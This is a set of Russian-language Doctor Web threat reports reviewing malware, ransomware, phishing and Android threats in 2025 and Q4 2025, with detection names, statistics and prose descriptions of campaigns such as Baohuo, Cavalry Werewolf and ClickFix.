В этом же месяце эксперты «Доктор Веб» обнаружили Android-трояна Android.Spy.1292.origin, которого злоумышленники внедрили в одну из версий картографической программы Alpine Quest и использовали для слежки за российскими военнослужащими. Вредоносное приложение собирало конфиденциальную информацию и позволяло атакующим красть файлы с зараженных устройств.

В июле на сайте компании «Доктор Веб» вышел материал о троянских программах Trojan.Scavenger, предназначенных для кражи криптовалюты и паролей. Злоумышленники распространяли их под видом модов, читов и патчей для игр. Эти вредоносные приложения запускались с использованием легитимного ПО, в том числе через эксплуатацию в нем уязвимостей класса DLL Search Order Hijacking.

В августе наши специалисты уведомили о распространении многофункционального бэкдора Android.Backdoor.916.origin, который был нацелен на представителей российских компаний. Вредоносное приложение под видом антивируса распространялось через личные сообщения в мессенджерах. Попадая на целевые устройства, Android.Backdoor.916.origin собирал конфиденциальные данные и позволял атакующим следить за жертвами.

Кроме того, в августе антивирусная лаборатория «Доктор Веб» выпустила исследование таргетированной атаки группировки Scaly Wolf на российское машиностроительное предприятие. Киберпреступники задействовали целый набор вредоносных инструментов, среди которых одним из основных стал модульный бэкдор Updatar. Он позволял атакующим собирать конфиденциальные данные с зараженных компьютеров.

В октябре эксперты «Доктор Веб» рассказали о бэкдоре Android.Backdoor.Baohuo.1.origin, встроенном в модифицированные злоумышленниками версии мессенджера Telegram X. Android.Backdoor.Baohuo.1.origin крадет логины и пароли от учетных записей Telegram, а также похищает ряд других конфиденциальных данных. Вредоносная программа позволяет злоумышленникам получить полный контроль над учетной записью пользователя и управлять мессенджером, выполняя в нем действия от имени жертвы. Например, атакующие могут незаметно вступать в Telegram-каналы и покидать их, а также скрывать новые авторизованные устройства в интерфейсе троянской модификации Telegram X.

В ноябре мы опубликовали исследование таргетированной атаки хакерской группировки Cavalry Werewolf на российское государственное учреждение. При анализе инцидента эксперты «Доктор Веб» обнаружили множество вредоносных инструментов киберпреступников, включая инструменты с открытым исходным кодом. Вирусные аналитики изучили особенности группировки и выяснили, что ее участники предпочитают использовать бэкдоры с функциональностью обратного шелла и часто применяют Telegram API для управления зараженными компьютерами. Кроме того, они начинают атаки с отправки фишинговых писем якобы от имени государственных структур и прикрепляют к таким сообщениям вредоносное ПО, замаскированное под различные официальные документы.

В декабре компания «Доктор Веб» опубликовала анализ вредоносного приложения Trojan.ChimeraWire, который искусственно увеличивает популярность сайтов, притворяясь для этого человеком. Троянское приложение ищет нужные сайты в поисковых системах Google и Bing, открывает их и выполняет клики на загруженных веб-страницах в соответствии с полученными от злоумышленников заданиями. Trojan.ChimeraWire устанавливается на компьютеры при помощи ряда вредоносных программ, которые эксплуатируют уязвимости класса DLL Search Order Hijacking.

В течение 2025 года наблюдался рост популярности атак с использованием метода ClickFix. Он заключается в том, что злоумышленники применяют социальную инженерию, обманом подталкивая потенциальных жертв к самостоятельному запуску вредоносного кода. Когда пользователи попадают на вредоносный или скомпрометированный сайт, тот сообщает им о якобы возникшей ошибке или о необходимости обновить браузер и предлагает «исправить» проблему. Для этого, в зависимости от варианта атаки, пользователей просят либо скопировать указанные на странице строки, либо просто нажать на соответствующую кнопку (например, «Обновить» или «Исправить»). В последнем случае нужное содержимое будет автоматически скопировано в буфер обмена. Затем их просят запустить командную строку или терминал PowerShell, вставить туда содержимое буфера обмена и нажать клавишу Enter. В результате жертвы самостоятельно исполняют вредоносный код, который запускает цепочку заражения компьютера. Подробнее об атаках ClickFix можно узнать в соответствующем материале на нашем сайте.

Вирусная обстановка

По данным статистики детектирований антивируса Dr.Web, в 2025 году общее число обнаруженных угроз возросло на 5,45% по сравнению с 2024 годом. Число уникальных угроз снизилось на 15,89%. Чаще всего пользователи сталкивались с различными вредоносными скриптами и рекламными троянами. Кроме того, распространение получили трояны, которые используются для запуска других вредоносных программ. Также пользователям вновь угрожали троянские приложения, которые созданы на скриптовом языке AutoIt и распространяются в составе другого вредоносного ПО для затруднения его обнаружения.

VBS.KeySender.6
VBS.KeySender.7: Вредоносный скрипт, который в бесконечном цикле ищет окна с текстом mode extensions, разработчика и розробника и шлет им событие нажатия кнопки Escape, принудительно закрывая их.
Trojan.BPlug.4242: Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.
Trojan.Starter.8319
Trojan.Starter.8326
Trojan.Starter.8332: Детектирование вредоносных XML-скриптов, которые запускают трояна Trojan.AutoIt.289 и его компоненты.
JS.Siggen5.44590: Вредоносный код, добавленный в публичную JavaScript-библиотеку es5-ext-main. Демонстрирует определенное сообщение, если пакет установлен на сервер с часовым поясом российских городов.
Trojan.Siggen30.53926: Хост-процесс модифицированного злоумышленниками фреймворка Electron, мимикрирующий под компонент приложения Steam (Steam Client WebHelper) и загружающий JavaScript-бэкдор.
JS.MalVpn.1: Вредоносный скрипт, который различные вредоносные программы используют для соединения с управляющими серверами.
Trojan.Siggen31.34463: Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в %appdata%\utorrent\lib.dll. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.

В почтовом трафике в 2025 году чаще всего встречались троянские программы, которые скачивали и устанавливали другое вредоносное ПО. Злоумышленники также распространяли через электронные письма различные бэкдоры, эксплойты, фишинговые документы и вредоносные скрипты.

W97M.DownLoader.2938: Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.
JS.Phishing.684
JS.Phishing.745: Вредоносный сценарий на языке JavaScript, формирующий фишинговую веб-страницу.
BackDoor.AgentTeslaNET.20: Вредоносная программа-шпион, предназначенная для кражи конфиденциальной информации. Например, она собирает и передает злоумышленникам логины и пароли из множества приложений, таких как браузеры, мессенджеры, почтовые клиенты, базы данных и т. д. Она также крадет данные из буфера обмена, реализует функциональность кейлоггера и может создавать снимки экрана (скриншоты).
Win32.Expiro.153: Файловый вирус, заражающий исполняемые файлы Windows. Его основное предназначение заключается в хищении паролей от различных программ.
JS.DownLoader.1225: Эвристическое детектирование для ZIP-архивов, содержащих скрипты JavaScript с подозрительными именами.
Trojan.PackedNET.3223: Детектирование вредоносных программ, защищенных упаковщиком.
Trojan.AutoIt.1413: Детектирование упакованной версии троянской программы Trojan.AutoIt.289, написанной на скриптовом языке AutoIt. Она распространяется в составе группы из нескольких вредоносных приложений: майнера, бэкдора и модуля для самостоятельного распространения. Trojan.AutoIt.289 выполняет различные вредоносные действия, затрудняющие обнаружение основной полезной нагрузки.

Шифровальщики

По сравнению с 2024, в 2025 году в Службу технической поддержки «Доктор Веб» поступило на 35,98% меньше запросов от пользователей, которые пострадали от троянских программ-шифровальщиков. Динамика регистрации запросов на расшифровку файлов представлена на диаграмме ниже.

Наиболее распространенные шифровальщики в 2025 году

Trojan.Encoder.35534 (23,22% обращений пользователей): Шифровальщик, также известный как Mimic. При поиске целевых файлов для шифрования троян использует библиотеку everything.dll легитимной программы Everything, предназначенной для мгновенного поиска файлов на Windows-компьютерах.
Trojan.Encoder.35209 (3,33% обращений пользователей): Шифровальщик, основанный на исходном коде трояна-энкодера Conti. Шифрует файлы при помощи алгоритма ChaCha20. После ликвидации ряда управляющих серверов злоумышленников и раскрытия приватных RSA-ключей шифрования для некоторых модификаций этой вредоносной программы доступна расшифровка затронутых файлов.
Trojan.Encoder.35067 (2,50% обращений пользователей): Шифровальщик, известный как Macop (один из вариантов этого трояна — Trojan.Encoder.30572). Обладает небольшим размером, порядка 30-40 Кбайт. Отчасти это обусловлено тем, что троян не несет с собой сторонних криптографических библиотек, а для шифрования и генерации ключей пользуется исключительно CryptoAPI-функциями. Для шифрования файлов применяет алгоритм AES-256, а сами ключи шифруются RSA-1024.
Trojan.Encoder.41868 (2,31% обращений пользователей): Шифровальщик, артефакты в котором указывают на причастность к его созданию хакерской группировки C77L.
Trojan.Encoder.29750 (2,13% обращений пользователей): Троян-вымогатель, имеющий несколько версий. Его актуальные модификации шифруют файлы алгоритмом AES-256+RSA.

Сетевое мошенничество

В 2025 году интернет-аналитики компании «Доктор Веб» наблюдали рост числа фишинговых сайтов, созданных для кражи учетных записей мессенджера Telegram. Злоумышленники использовали различные схемы: поддельные страницы аутентификации и авторизации, поддельные сообщения от службы поддержки Telegram, предупреждавшие о якобы выявленных нарушениях при использовании мессенджера и необходимости выполнить «проверку» учетной записи, и т. д.

Пример фишингового сайта, сообщающего о необходимости выполнить проверку учетной записи Telegram в связи с неким нарушением условий использования сервиса

Подобные сайты создавались и для пользователей других сервисов, например игровых платформ, интернет-магазинов и т. д. Подделки могли выглядеть как настоящие интернет-ресурсы и предлагали войти в учетную запись. Если пользователи попадались на уловку, конфиденциальная информация оказывалась у злоумышленников.

Поддельный сайт сервиса Steam демонстрирует фишинговую форму для ввода логина и пароля

Пользователи снова сталкивались с различными вариантами мошеннических интернет-ресурсов, которые предлагали всевозможные подарки и бонусы, участие в неких «выгодных акциях». Распространение получили поддельные сайты российских маркетплейсов, где посетители якобы могли принять участие в розыгрыше призов. «Выигрыш» на них был запрограммирован, а для его «получения» от жертвы требовалась определенная оплата, например якобы в виде налога, затем — за доставку товара и его страховку. В других вариантах мошеннической схемы нужный товар якобы отсутствовал, но вместо него предлагался денежный эквивалент. Для «получения» денег пользователь также должен был совершить ряд платежей: в виде пошлины, страховки и т. п. Никакого приза жертва в итоге не получала.

Пример поддельного сайта маркетплейса, предлагающего принять участие в «розыгрыше призов»

Вариантами подобных схем были ориентированные на жителей Великобритании поддельные сайты транспортных компаний. Они предлагали принять участие в розыгрыше транспортных карт, якобы приуроченных к определенному событию и позволяющих бесплатно пользоваться услугами общественного транспорта. После «выигрыша» мошенники просили жертв предоставить персональные данные и оплатить небольшую «комиссию».

Мошеннический сайт якобы от имени транспортной компании предлагает принять участие в «розыгрыше карты»

Актуальными остались всевозможные мошеннические сайты финансовой тематики. Популярными среди злоумышленников снова были ресурсы, предлагавшие зарабатывать торговлей на рынке с использованием автоматизированных систем на базе неких уникальных алгоритмов и технологий искусственного интеллекта. Подобные сайты создаются с ориентиром на жителей многих стран. Чаще всего на них запрашиваются персональные данные для регистрации «заявки» или «учетной записи», после чего информация попадает в руки злоумышленников, которые используют ее по своему усмотрению. В дальнейшем они могут перепродать данные или же продолжат заманивать потенциальную жертву в поддельный инвестиционный сервис, требуя внести деньги на «торговый» счет.

Один из мошеннических сайтов, предлагавших доступ к «инвестиционной платформе» на базе технологий искусственного интеллекта, якобы имел отношение к корпорации Apple

Многие такие сайты построены на базе похожих шаблонов в виде поддельного чата с «виртуальным помощником» или «сотрудником» той или иной компании, якобы от имени которой мошенники обращаются к потенциальной жертве. Пользователем предлагается ответить на ряд вопросов, после чего указать персональные данные.

На одном из сайтов злоумышленники предлагали пользователям из Франции получить доступ к несуществующему автоматизированному торговому ПО TraderAI, который якобы позволит зарабатывать от 3 500€

Один из ресурсов рекламировал инвестиционный сервис, якобы построенный непосредственно на базе мессенджера Telegram. Сайт обещал доход 10 000€ в месяц от автоматической торговли акциями мировых компаний «прямо в телефонном браузере».

Сайт мошенников приглашает присоединиться к «платформе Telegram», которая якобы самостоятельно торгует акциями

Злоумышленники также предлагали потенциальным жертвам заработать при помощи «торговых ботов», якобы созданных при участии крупных компаний и сервисов, таких как Telegram, WhatsApp, TikTok и других.

Пример сайта, который приглашал воспользоваться несуществующим торговым ботом, якобы имеющим отношение к мессенджеру WhatsApp

В течение 2025 года наши интернет-аналитики выявляли новые мошеннические сайты предлагавшие инвестировать в нефтегазовый сектор пользователям многих стран, включая Россию, страны СНГ и Европы. На таких сайтах у потенциальных жертв в большинстве случаев также запрашивается персональная информация: имя, фамилия, номер мобильного телефона, адрес электронной почты и т. д.

Мошеннический сайт, ориентированный на граждан Киргизии, предлагает им «зарабатывать на нефти и газе», обещая крупный доход

Вновь появлялись мошеннические сайты, предлагавшие получить «государственную помощь» в виде выплат или компенсаций. Например, в российском сегменте интернета были распространены мошеннические ресурсы, якобы имеющие отношение к порталу «Госуслуги».

Пример мошеннического сайта, который якобы был связан с сервисом «Госуслуги» и обещал российским пользователям стабильные выплаты от государства и крупной нефтегазовой компании. Для «участия» в программе выплат у жертвы запрашивались персональные данные

Наши специалисты также отметили появление очередных поддельных сайтов образовательных проектов. Они предлагали пользователям пройти различные обучающие курсы, чтобы повысить свою финансовую грамотность, освоить ту или иную профессию т. д. Для «доступа» к обучению у потенциальных жертв, как и во многих других подобных схемах, также запрашивалась персональная информация.

Один из мошеннических сайтов предлагал освоить английский язык

Интернет-аналитики «Доктор Веб» выявляли новые мошеннические сайты по продаже театральных билетов. На таких ресурсах злоумышленники предлагают потенциальным жертвам приобрести билеты по выгодным ценам, однако после «оплаты» пользователи их не получают.

Пример мошеннического сайта, продававшего несуществующие театральные билеты

Кроме того, распространение получили и новые поддельные сайты частных кинотеатров. Как и в случае с билетами в театр, мошенники предлагают потенциальным жертвам купить билеты в кино, но те в итоге лишь отдают свои деньги злоумышленникам.

Поддельный сайт одного из частных кинотеатров

Для мобильных устройств

Согласно статистике детектирований Dr.Web Security Space для мобильных устройств, в 2025 году пользователи Android чаще всего сталкивались с рекламными троянами Android.MobiDash и Android.HiddenAds, а также программами-подделками Android.FakeApp, которые вместо заявленной функциональности могут загружать различные веб-сайты, в том числе мошеннические и вредоносные. Отмечался рост активности троянских приложений Android.Triada. Они представляют собой многофункциональные угрозы, которые злоумышленники встраивают в прошивку Android-устройств. Кроме того, наблюдался рост числа атак банковских троянов Android.Banker. В то же время активность банкеров Android.SpyMax наоборот снизилась.

В минувшем году вирусописатели продолжили использовать различные техники защиты вредоносного ПО для ОС Android. Одной из них был метод конвертации DEX-кода в C-код (известен как DCC или DEX to C).

Самыми распространенными нежелательными приложениями стали программы Program.FakeMoney. Они предлагают пользователям за виртуальные награды выполнять различные задания и обещают возможность конвертировать вознаграждение в настоящие деньги. Но самом деле в них такой возможности нет. Кроме того, на защищаемых устройствах часто детектировались приложения Program.FakeAntiVirus.1 и Program.CloudInject.1. Первые имитируют работу антивирусов и обнаруживают несуществующие угрозы, предлагая «вылечить» заражение, купив полную версию ПО. Вторые представляют собой приложения, которые были модифицированы через популярный облачный сервис. При модификации к ним добавляются опасные системные разрешения и обфусцированный код, назначение которого нельзя проконтролировать.

Программы, которые были модифицированы при помощи утилиты NP Manager (детектируются как Tool.NPMod), стали самым распространенным потенциально опасным ПО. Утилита обфусцирует код модифицируемых приложений и позволяет обходить проверку их цифровой подписи. Наиболее активными рекламными программами в 2025 году были сторонние модификации WhatsApp (Adware.ModAd.1), которые автоматически открывают рекламные ссылки при работе с мессенджером.

В 2025 году были выявлены новые случаи заражения прошивок Android-устройств. Об одном из них наша компания уведомила в апреле. Злоумышленники предустановили вредоносное приложение Android.Clipper.31 в системную область нескольких бюджетных моделей смартфонов и с его помощью похищали криптовалюту пользователей. Еще одним атакующим удалось внедрить опасных троянов Android.Triada в прошивку других моделей Android-смартфонов. Кроме того, были зафиксированы очередные случаи заражения прошивок TV-приставок под управлением Android новыми версиями трояна Android.Vo1d, которого наша компания обнаружила в 2024 году.

В течение минувшего года антивирусная лаборатория «Доктор Веб» выявила ряд опасных вредоносных приложений. В апреле мы рассказали о трояне Android.Spy.1292.origin, который скрывался в модифицированной вирусописателями картографической программе Alpine Quest и атаковал российских военнослужащих. Android.Spy.1292.origin передавал злоумышленникам данные о номере мобильного телефона и учетных записях, собирал контакты из телефонной книги, геолокацию зараженного устройства и сведения о хранящихся на нем файлах. Он также мог похищать определенные файлы по команде атакующих. Тех в первую очередь интересовали конфиденциальные документы, которые передавались через мессенджеры, а также файл журнала локаций программы Alpine Quest.

В августе наши специалисты предупредили о бэкдоре Android.Backdoor.916.origin, которого под видом антивируса злоумышленники распространяли через личные сообщения в мессенджерах. Android.Backdoor.916.origin крадет конфиденциальную информацию и позволяет следить за пользователями. Основной целью этого бэкдора стали сотрудники российского бизнеса.

В октябре мы рассказали о многофункциональном бэкдоре Android.Backdoor.Baohuo.1.origin, которого наши вирусные аналитики обнаружили в модифицированных версиях мессенджера Telegram X. Эта вредоносная программа также используется для кражи конфиденциальных данных, включая логины и пароли от Telegram, входящие СМС, переписку в мессенджере и данные из буфера обмена. При этом бэкдор позволяет злоумышленникам полностью управлять мессенджером и контролировать взломанную учетную запись Telegram жертвы. Для управления бэкдором киберпреступники использовали как C2-сервер, так и базу данных Redis, что ранее не встречалось в Android-угрозах. Android.Backdoor.Baohuo.1.origin преимущественно был нацелен на жителей Индонезии и Бразилии.

Более подробно о вирусной обстановке для мобильных устройств в 2025 году читайте в нашем обзоре.

Перспективы и вероятные тенденции

В новом, 2026 году одной из наиболее распространенных угроз для пользователей, вероятно, останутся рекламные трояны, с помощью которых злоумышленники получают нелегальный доход. Стоит ожидать, что киберпреступники станут чаще использовать банковские троянские приложения, которые также позволяют обогащаться киберпреступникам.

Возможен дальнейший рост популярности различных инструментов и методик, помогающих скрывать вредоносную активность. Среди них можно отметить использование упаковщиков и обфускаторов, применение вредоносных программ-дропперов и многоступенчатых загрузчиков, а также использование стеганографии для сокрытия полезной нагрузки. Кроме того, при создании вредоносного ПО киберпреступники, в том числе с небольшим опытом в программировании, все чаще будут прибегать к помощи ИИ-ассистентов. В результате появятся новые семейства вредоносных программ, а количество угроз возрастет.

Под прицелом вновь окажутся государственные и корпоративные структуры, что выльется в очередные таргетированные атаки. Также вероятны новые случаи заражения прошивок Android-смартфонов, ТВ-приставок и других типов мобильных устройств, особенно в бюджетном сегменте. Сохранится активность интернет-мошенников.

«Доктор Веб»: обзор вирусной активности для мобильных устройств в IV квартале 2025 года

Mon, 12 Jan 2026 00:00:00 GMT

Скачать PDF

12 января 2026 года

Согласно данным статистики детектирований Dr.Web Security Space для мобильных устройств, в IV квартале 2025 года самыми распространенными Android-угрозами вновь стали рекламные трояны Android.MobiDash и Android.HiddenAds, демонстрирующие надоедливые объявления. При этом их активность снизилась: первые обнаруживались на защищаемых устройствах на 43,24% реже, а вторые — на 18,06%. За ними расположились трояны семейства Android.Siggen, которые включают вредоносные приложения, обладающие различной функциональностью. Они также детектировались несколько реже — на 27,47%.

В то же время отмечался заметный рост активности банковских троянов, с которыми пользователи сталкивались чаще на 65,52%. Этот рост произошел в большей степени за счет представителей семейства Android.Banker. Такие вредоносные программы перехватывают СМС с одноразовыми кодами для подтверждения банковских операций, а также могут имитировать внешний вид настоящего банковского ПО и демонстрировать фишинговые окна.

Среди нежелательного ПО наибольшее распространение получили Android-программы, модифицированные через облачный сервис CloudInject (антивирус Dr.Web детектирует их как Program.CloudInject). С его помощью в приложения добавляются опасные системные разрешения и обфусцированный код, функциональность которого невозможно проконтролировать. Кроме того, на устройствах часто встречались поддельные антивирусы Program.FakeAntiVirus, которые обнаруживают несуществующие угрозы и для их «лечения» требуют приобрести полную версию, а также Program.FakeMoney — приложения, якобы позволяющие зарабатывать на выполнении различных заданий.

Самым распространенным потенциально опасным ПО в IV квартале стали приложения Tool.NPMod, модифицированные при помощи утилиты NP Manager. Она обфусцирует код модов и добавляет в них специальный модуль, позволяющий обходить проверку цифровой подписи после модификации приложений. Среди рекламных программ лидерство сохранили представители семейства Adware.Adpush. Это специальные программные модули, которые разработчики встраивают в ПО для демонстрации рекламных уведомлений.

В октябре наши специалисты рассказали об опасном бэкдоре Android.Backdoor.Baohuo.1.origin, который злоумышленники встроили в неофициальные модификации мессенджера Telegram X и распространяли как через вредоносные сайты, так и через сторонние каталоги Android-приложений. Вредоносная программа похищает логины и пароли от учетных записей Telegram, а также другие конфиденциальные данные. Кроме того, с ее помощью киберпреступники фактически способны управлять аккаунтом жертвы и незаметно выполнять в мессенджере различные действия от ее имени. Например — присоединяться к Telegram-каналам и выходить из них, скрывать новые авторизованные устройства, скрывать определенные сообщения и т. д. Android.Backdoor.Baohuo.1.origin управляется в том числе через базу данных Redis, что ранее не встречалось в Android-угрозах. В общей сложности бэкдор заразил порядка 58 000 устройств, среди которых около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и автомобилей с бортовыми компьютерами на базе Android.

За минувший квартал антивирусная лаборатория компании «Доктор Веб» выявила в каталоге Google Play новые вредоносные программы, среди которых были трояны Android.Joker, подписывающие жертв на платные услуги, и различные программы-подделки Android.FakeApp, применяемые в мошеннических схемах. В общей сложности их загрузили по меньшей мере 263 000 раз.

Главные тенденции IV квартала

Рекламные трояны остаются наиболее распространенными Android-угрозами
Рост числа атак банковских троянов
Распространение опасного бэкдора Android.Backdoor.Baohuo.1.origin, встроенного в модификации мессенджера Telegram X
Появление очередных вредоносных приложений в каталоге Google Play

По данным Dr.Web Security Space для мобильных устройств

Android.MobiDash.7859: Троянская программа, показывающая надоедливую рекламу. Она представляет собой программный модуль, который разработчики ПО встраивают в приложения.
Android.FakeApp.1600: Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.
Android.Click.1812: Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.
Android.Packed.57.origin: Детектирование обфускатора, который в том числе используется для защиты вредоносных приложений (например, некоторых версий банковских троянов Android.SpyMax).
Android.Triada.5847: Детектирование упаковщика для троянов семейства Android.Triada, предназначенного для их защиты от анализа и обнаружения. Чаще всего злоумышленники используют его совместно с вредоносными модами мессенджера Telegram, в которые непосредственно встроены эти трояны.

Program.CloudInject.5
Program.CloudInject.1: Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как Tool.CloudInject). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими: блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.
Program.FakeAntiVirus.1: Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.
Program.FakeMoney.11: Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно перевести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.
Program.SnoopPhone.1.origin: Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение устройства и выполнять аудиозапись окружения.

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.1.origin: Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. В такие программы внедрен специальный модуль, который позволяет обойти проверку цифровой подписи после их модификации.
Tool.LuckyPatcher.2.origin: Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.
Tool.Androlua.1.origin: Детектирование ряда потенциально опасных версий специализированного фреймворка для разработки Android-программ на скриптовом языке программирования Lua. Основная логика Lua-приложений расположена в соответствующих скриптах, которые зашифрованы и расшифровываются интерпретатором перед выполнением. Часто данный фреймворк по умолчанию запрашивает доступ ко множеству системных разрешений для работы. В результате исполняемые через него Lua-скрипты способны выполнять различные вредоносные действия в соответствии с полученными разрешениями.

Adware.AdPush.3.origin
Adware.Adpush.21846: Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.
Adware.Bastion.1.origin: Детектирование программ-оптимизаторов, которые периодически создают уведомления с вводящими в заблуждение сообщениями о якобы нехватке памяти и ошибках системы с целью показывать рекламу во время «оптимизации».
Adware.Airpush.7.origin: Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.
Adware.ModAd.1: Детектирование некоторых модифицированных версий (модов) мессенджера WhatsApp, в функции которых внедрен код для загрузки заданных ссылок через веб-отображение во время работы с мессенджером. С этих интернет-адресов выполняется перенаправление на рекламируемые сайты, например онлайн-казино и букмекеров, сайты для взрослых.

Угрозы в Google Play

В течение IV квартала 2025 года вирусные аналитики компании «Доктор Веб» зафиксировали появление в каталоге Google Play более двух десятков вредоносных приложений Android.Joker, предназначенных для подписки пользователей на платные услуги. Злоумышленники замаскировали их под различное ПО: мессенджеры, утилиты для оптимизации работы системы, графические редакторы и программы для просмотра фильмов.

Примеры выявленных вредоносных программ Android.Joker. Android.Joker.2496 был замаскирован под инструмент Useful Cleaner для «очистки мусора» на телефоне, а одна из модификаций Android.Joker.2495 — под проигрыватель фильмов Reel Drama

Также наши специалисты обнаружили несколько новых программ-подделок из семейства Android.FakeApp. Как и ранее, некоторые из них распространились под видом финансовых приложений и загружали мошеннические сайты. Другие такие подделки выдавались за игры. При определенных условиях (например, если IP-адрес пользователя удовлетворял требованиям злоумышленников) они могли загружать сайты букмекерских контор и онлайн-казино.

Игра Chicken Road Fun являлась программой-подделкой Android.FakeApp.1910, и вместо того, чтобы предоставить ожидаемую пользователем функциональность, могла загрузить сайт онлайн-казино

Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.

Индикаторы компрометации

«Доктор Веб»: обзор вирусной активности в IV квартале 2025 года

Mon, 12 Jan 2026 00:00:00 GMT

Скачать PDF

12 января 2026 года

Согласно статистике детектирований антивируса Dr.Web, в IV квартале 2025 года общее число обнаруженных угроз увеличилось на 16,05% по сравнению с III кварталом. Число уникальных угроз при этом снизилось на 1,13%. Наибольшее распространение получили нежелательные рекламные приложения, вредоносные скрипты и различные вредоносные программы, в том числе загрузчики и рекламные трояны.

В почтовом трафике чаще всего детектировались троянские приложения, среди которых были загрузчики, похитители паролей и дропперы. Кроме того, через электронные письма распространялись эксплойты, бэкдоры и всевозможные вредоносные скрипты.

Пользователи, чьи файлы были затронуты троянами-шифровальщиками, чаще всего сталкивались с энкодерами Trojan.Encoder.35534, Trojan.Encoder.41868 и Trojan.Encoder.29750.

В октябре мы рассказали о бэкдоре для Android-устройств Android.Backdoor.Baohuo.1.origin, которого киберпреступники распространяют в составе модифицированных версий мессенджера Telegram X. Эта вредоносная программа похищает логины и пароли от учетных записей Telegram и другие конфиденциальные данные. С ее помощью вирусописатели могут управлять взломанными аккаунтами жертв и полностью контролировать сам мессенджер, выполняя различные действия от имени пользователей.

В ноябре наша антивирусная лаборатория опубликовала исследование таргетированной атаки, совершенной хакерской группировкой Cavalry Werewolf на российское государственное учреждение. В ходе проведенной экспертизы специалисты «Доктор Веб» выявили множество вредоносных инструментов злоумышленников, в том числе инструменты с открытым исходным кодом, которые киберпреступники применяют в своих кампаниях. Были также изучены особенности группировки и характерные для нее действия внутри скомпрометированных сетей.

Уже в декабре на нашем сайте вышел материал об уникальном трояне Trojan.ChimeraWire, который «накручивает» популярность сайтов и для этого притворяется человеком, чтобы его действия не заблокировала антибот-защита интернет-площадок. Вредоносная программа самостоятельно ищет нужные сайты в поисковых системах, открывает их и выполняет клики на веб-страницах в соответствии с получаемыми от злоумышленников параметрами. Trojan.ChimeraWire попадает на компьютеры в результате работы нескольких вредоносных приложений, которые эксплуатируют уязвимости класса DLL Search Order Hijacking, а также используют антиотладочные приемы, чтобы избежать обнаружения.

В течение IV квартала интернет-аналитики «Доктор Веб» зафиксировали новые мошеннические сайты, которые сулили потенциальным жертвам быстрый и легкий заработок. Также были выявлены очередные фишинговые интернет-ресурсы и поддельные сайты маркетплейсов.

Наши специалисты обнаружили очередные вредоносные программы в каталоге Google Play. Среди них трояны Android.Joker, которые подписывают владельцев Android-устройств на платные услуги, а также вредоносные приложения Android.FakeApp, которые злоумышленники используют в различных мошеннических схемах. В то же время статистика детектирований Dr.Web Security Space для мобильных устройств показала рост активности банковских троянов для платформы Android.

Главные тенденции IV квартала

Увеличение числа угроз, детектируемых на защищаемых устройствах
Снижение числа уникальных угроз, использованных при атаках
Рост количества запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками
Возросшая активность банковских троянов, нацеленных на владельцев Android-устройств
Распространение бэкдора Android.Backdoor.Baohuo.1.origin, взламывающего учетные записи Telegram пользователей Android
Появление новых вредоносных приложений в каталоге Google Play

По данным сервиса статистики «Доктор Веб»

Наиболее распространенные угрозы IV квартала 2025 года

Trojan.Siggen31.34463: Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в %appdata%\utorrent\lib.dll. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.
Adware.Downware.20091: Рекламное ПО, выступающее в роли промежуточного установщика пиратских программ.
VBS.KeySender.7: Вредоносный скрипт, который в бесконечном цикле ищет окна с текстом mode extensions, разработчика и розробника и шлет им событие нажатия кнопки Escape, принудительно закрывая их.
